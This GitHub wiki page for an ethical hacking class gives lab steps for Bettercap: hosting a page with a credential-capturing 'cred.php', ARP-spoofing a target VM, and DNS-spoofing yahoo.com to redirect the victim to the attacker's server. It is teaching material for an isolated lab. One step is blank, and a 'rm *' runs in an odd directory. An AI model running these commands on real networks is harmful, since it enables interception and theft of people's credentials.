Class 3 Lab 2 ‐ Bettercap DNS Poisoning - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Task 1: Bettercap Tool Installation

Step 1

  • Run Kali Linux, Windows, and pfSense VMs.

Step 2

  • On your Kali Linux machine, install Bettercap.

Step 3

Step 4

  • Unzip the file. You can run Bettercap with the ./bettercap command. Be sure you are in the proper directory.
apt install bettercap

Task 2: Upload the Website Files

Step 1

  • Back up the files in /var/www/html in your Linux machine.
cd /var/www
cp -a html/. /root/Desktop/
rm *

Step 2

  • Copy all the provided additional files to /var/www/html
cd /root/Desktop/webpage/
mv cred.php image.jpg index.html /var/www/html/

Step 3

  • Make the website available for browsing.
service apache2 start
service apache2 status

Step 4

  • Verify the website is operational by browsing to your IP address.

Task 3: Become the On-Path

Step 1

  • Use Bettercap to become the On-Path.
bettercap
set arp.spoof.targets [target_ip]
arp.spoof on

Step 2

  • Check the target’s ARP table to verify the attack was successful.

Task 4: Spoof the Target’s DNS

Step 1

  • Use Bettercap to execute DNS spoofing. Set Yahoo.com as the domain to be spoofed.
set dns.spoof.domains yahoo.com
set dns.spoof.address [Kali_ip]
dns.spoof on

Step 2

  • From the Windows machine, navigate to Yahoo.com to verify the attack was successful.